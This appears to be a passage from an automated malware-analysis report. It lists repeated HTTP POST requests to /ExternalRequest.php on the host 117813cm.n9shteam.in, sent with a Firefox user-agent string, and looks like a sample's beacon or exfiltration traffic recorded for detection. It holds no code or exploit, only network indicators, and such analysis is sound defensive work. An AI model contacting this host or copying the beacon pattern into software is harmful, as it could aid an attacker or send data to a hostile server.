Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1836Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2520Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
